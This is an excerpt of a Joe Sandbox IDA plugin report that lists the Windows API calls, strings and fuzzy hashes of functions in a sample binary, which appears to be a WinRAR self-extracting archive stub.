                                                                      • API String ID: 3160817290-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 007DDC47
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007DDC61
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DDC72
                                                                      • TranslateMessage.USER32(?), ref: 007DDC7C
                                                                      • DispatchMessageW.USER32(?), ref: 007DDC86
                                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 007DDC91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                      • String ID:
                                                                      • API String ID: 2148572870-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007DA699: GetDC.USER32(00000000), ref: 007DA69D
                                                                        • Part of subcall function 007DA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 007DA6A8
                                                                        • Part of subcall function 007DA699: ReleaseDC.USER32(00000000,00000000), ref: 007DA6B3
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 007DA83C
                                                                        • Part of subcall function 007DAAC9: GetDC.USER32(00000000), ref: 007DAAD2
                                                                        • Part of subcall function 007DAAC9: GetObjectW.GDI32(?,00000018,?), ref: 007DAB01
                                                                        • Part of subcall function 007DAAC9: ReleaseDC.USER32(00000000,?), ref: 007DAB99
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectRelease$CapsDevice
                                                                      • String ID: "}$($A}
                                                                      • API String ID: 1061551593-398561874
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007D05DA: _wcslen.LIBCMT ref: 007D05E0
                                                                        • Part of subcall function 007CB92D: _wcsrchr.LIBVCRUNTIME ref: 007CB944
                                                                      • _wcslen.LIBCMT ref: 007CC197
                                                                      • _wcslen.LIBCMT ref: 007CC1DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$_wcsrchr
                                                                      • String ID: .exe$.rar$.sfx
                                                                      • API String ID: 3513545583-31770016
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 007CBB27
                                                                      • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,007CA275,?,?,00000800,?,007CA23A,?,007C755C), ref: 007CBBC5
                                                                      • _wcslen.LIBCMT ref: 007CBC3B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$CurrentDirectory
                                                                      • String ID: UNC$\\?\
                                                                      • API String ID: 3341907918-253988292
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _wcschr.LIBVCRUNTIME ref: 007DCD84
                                                                        • Part of subcall function 007DAF98: _wcschr.LIBVCRUNTIME ref: 007DB033
                                                                        • Part of subcall function 007D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007CC116,00000000,.exe,?,?,00000800,?,?,?,007D8E3C), ref: 007D1FD1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcschr$CompareString
                                                                      • String ID: <$HIDE$MAX$MIN
                                                                      • API String ID: 69343711-3358265660
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 007DAAD2
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 007DAB01
                                                                      • ReleaseDC.USER32(00000000,?), ref: 007DAB99
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectRelease
                                                                      • String ID: -}$7}
                                                                      • API String ID: 1429681911-118115984
                                                                      • Opcode ID: df37c619357c9a70e973d5f2634cfe247481e5470c96819397e81abb8fa697fd
                                                                      • Instruction ID: e8c491c492f838bbb5ba9b4713fb5b462701fe45dd392f638ff63158bcd25f42
                                                                      • Opcode Fuzzy Hash: df37c619357c9a70e973d5f2634cfe247481e5470c96819397e81abb8fa697fd
                                                                      • Instruction Fuzzy Hash: 1321E272108704AFD3119FA5DC48E6FBFE9FB89351F044829FA4692220D6399A568F72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _swprintf.LIBCMT ref: 007CB9B8
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • _wcschr.LIBVCRUNTIME ref: 007CB9D6
                                                                      • _wcschr.LIBVCRUNTIME ref: 007CB9E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                      • String ID: %c:\
                                                                      • API String ID: 525462905-3142399695
                                                                      • Opcode ID: 41eb4c503f971d6ddec505ae8fd4ddd9e89e27d33e5ad00b36d614aa9b221610
                                                                      • Instruction ID: d8512c56af9a722e34a15447c01b2e39139dfc8b7c735b9f6d8b40782c6f8ca6
                                                                      • Opcode Fuzzy Hash: 41eb4c503f971d6ddec505ae8fd4ddd9e89e27d33e5ad00b36d614aa9b221610
                                                                      • Instruction Fuzzy Hash: CC01F563504311E99A34AB368C8BE6BB7ACEFD5770F40840EF584D7082EB38E84083B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadBitmapW.USER32(00000065), ref: 007DB6ED
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 007DB712
                                                                      • DeleteObject.GDI32(00000000), ref: 007DB744
                                                                      • DeleteObject.GDI32(00000000), ref: 007DB767
                                                                        • Part of subcall function 007DA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,007DB73D,00000066), ref: 007DA6D5
                                                                        • Part of subcall function 007DA6C2: SizeofResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA6EC
                                                                        • Part of subcall function 007DA6C2: LoadResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA703
                                                                        • Part of subcall function 007DA6C2: LockResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA712
                                                                        • Part of subcall function 007DA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,007DB73D,00000066), ref: 007DA72D
                                                                        • Part of subcall function 007DA6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,007DB73D,00000066), ref: 007DA73E
                                                                        • Part of subcall function 007DA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 007DA7A7
                                                                        • Part of subcall function 007DA6C2: GlobalUnlock.KERNEL32(00000000), ref: 007DA7C6
                                                                        • Part of subcall function 007DA6C2: GlobalFree.KERNEL32(00000000), ref: 007DA7CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                      • String ID: ]
                                                                      • API String ID: 1428510222-3352871620
                                                                      • Opcode ID: d532ce47ef198594ddc24b0476e14e8b02359184a1e648b4ac919bbacb6469df
                                                                      • Instruction ID: 905cdffaf838d71cf75740372b0a53bb7221153aaf8a1d0d9fd43b6703d48e58
                                                                      • Opcode Fuzzy Hash: d532ce47ef198594ddc24b0476e14e8b02359184a1e648b4ac919bbacb6469df
                                                                      • Instruction Fuzzy Hash: A5016D36940615F7C7226B749C1DAAF7AB9BBC0B62F1A0017F900B7391DF69CD0646B2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • EndDialog.USER32(?,00000001), ref: 007DD64B
                                                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 007DD661
                                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 007DD675
                                                                      • SetDlgItemTextW.USER32(?,00000068), ref: 007DD684
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ItemText$DialogWindow
                                                                      • String ID: RENAMEDLG
                                                                      • API String ID: 445417207-3299779563
                                                                      • Opcode ID: c349eacd27064baebff7000a3d9ac69a167baeca9d54ab998552c0a392e4ebca
                                                                      • Instruction ID: bbabcbc02d150cd1c0130c580c1cad76f76c8e11e9e9a6c4f97138282f61bd29
                                                                      • Opcode Fuzzy Hash: c349eacd27064baebff7000a3d9ac69a167baeca9d54ab998552c0a392e4ebca
                                                                      • Instruction Fuzzy Hash: 42012833244214FAD2304F649D09F67777DFB5AB81F114412F305A21D1C6AADE059BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007E7E24,?,?,007E7DC4,?,007FC300,0000000C,007E7F1B,?,00000002), ref: 007E7E93
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007E7EA6
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,007E7E24,?,?,007E7DC4,?,007FC300,0000000C,007E7F1B,?,00000002,00000000), ref: 007E7EC9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 89e94bad45b52edef3365cb3c5171c5c70986732d6eed0374e56d6af5acb107a
                                                                      • Instruction ID: 2c513851ff56503c6b23ecd8d1f2a6014bb2c357a40c7db200b09b223c43b812
                                                                      • Opcode Fuzzy Hash: 89e94bad45b52edef3365cb3c5171c5c70986732d6eed0374e56d6af5acb107a
                                                                      • Instruction Fuzzy Hash: E7F06871901248BBCB15AFA1DC09BBEBFB5FF44711F0081A9F805A2260DB389F40CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007D0836
                                                                        • Part of subcall function 007D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007CF2D8,Crypt32.dll,00000000,007CF35C,?,?,007CF33E,?,?,?), ref: 007D0858
                                                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007CF2E4
                                                                      • GetProcAddress.KERNEL32(008081C8,CryptUnprotectMemory), ref: 007CF2F4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                      • API String ID: 2141747552-1753850145
                                                                      • Opcode ID: 0e0e68a644c697db41caa32c4829c9d9a84860f724aee93fb224e652e6bf0c0c
                                                                      • Instruction ID: bcb64313f4831aeb2473f52853d6af82be5dd62de1203f62eca8eab7d91d46b1
                                                                      • Opcode Fuzzy Hash: 0e0e68a644c697db41caa32c4829c9d9a84860f724aee93fb224e652e6bf0c0c
                                                                      • Instruction Fuzzy Hash: 16E08CB0911756AECB209F3A984DB22BFE56F04700F14C86EF1DAA3740DABCD580CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustPointer$_abort
                                                                      • String ID:
                                                                      • API String ID: 2252061734-0
                                                                      • Opcode ID: a5615ac3165e6dbcedd6d2ee31f5a53fb82d957a19082d019b7098ea8be16a3a
                                                                      • Instruction ID: cca332512b092dccac503f0569cbb302ed862d3d0e7f28170d586c99d47cb33e
                                                                      • Opcode Fuzzy Hash: a5615ac3165e6dbcedd6d2ee31f5a53fb82d957a19082d019b7098ea8be16a3a
                                                                      • Instruction Fuzzy Hash: 5B51E671602295EFDB29CF16D849B7A73A9FF18310F24451DE901472A2D739ED82D790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 007EBF39
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007EBF5C
                                                                        • Part of subcall function 007E8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,007E4286,?,0000015D,?,?,?,?,007E5762,000000FF,00000000,?,?), ref: 007E8E38
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007EBF82
                                                                      • _free.LIBCMT ref: 007EBF95
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007EBFA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      • String ID:
                                                                      • API String ID: 336800556-0
                                                                      • Opcode ID: b2bb19606681485d04673c17aa0e0ef5edfdc614e1f53b68c08ef7cca8241071
                                                                      • Instruction ID: 6e79ec7730c02fe59261d4bc2949099dfdd28c254479f0cff5650ed11b77f970
                                                                      • Opcode Fuzzy Hash: b2bb19606681485d04673c17aa0e0ef5edfdc614e1f53b68c08ef7cca8241071
                                                                      • Instruction Fuzzy Hash: 2001D4726036957F272116BB5C4CC7B7F6DDECABA03244129F908D2100EF68CD01D5B0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,007E91AD,007EB188,?,007E9813,00000001,00000364,?,007E40EF,?,?,00801098), ref: 007E986E
                                                                      • _free.LIBCMT ref: 007E98A3
                                                                      • _free.LIBCMT ref: 007E98CA
                                                                      • SetLastError.KERNEL32(00000000,?,00801098), ref: 007E98D7
                                                                      • SetLastError.KERNEL32(00000000,?,00801098), ref: 007E98E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 60209af43c6d62a3bbd2b9d96cfeecf52d0abdbec2c7ca5651e96bb210f4e6bb
                                                                      • Instruction ID: 843ccce34b8198f183c59edb0d6eb77946aef03c7d96262f0008b1a909472a01
                                                                      • Opcode Fuzzy Hash: 60209af43c6d62a3bbd2b9d96cfeecf52d0abdbec2c7ca5651e96bb210f4e6bb
                                                                      • Instruction Fuzzy Hash: 3C01F437247681ABC22263676C8992B272EDBDE7707250135F615962B2EE7C8C01926A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007D11CF: ResetEvent.KERNEL32(?), ref: 007D11E1
                                                                        • Part of subcall function 007D11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 007D11F5
                                                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 007D0F21
                                                                      • CloseHandle.KERNEL32(?,?), ref: 007D0F3B
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 007D0F54
                                                                      • CloseHandle.KERNEL32(?), ref: 007D0F60
                                                                      • CloseHandle.KERNEL32(?), ref: 007D0F6C
                                                                        • Part of subcall function 007D0FE4: WaitForSingleObject.KERNEL32(?,000000FF,007D1101,?,?,007D117F,?,?,?,?,?,007D1169), ref: 007D0FEA
                                                                        • Part of subcall function 007D0FE4: GetLastError.KERNEL32(?,?,007D117F,?,?,?,?,?,007D1169), ref: 007D0FF6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                      • String ID:
                                                                      • API String ID: 1868215902-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 007EC817
                                                                        • Part of subcall function 007E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?), ref: 007E8DE2
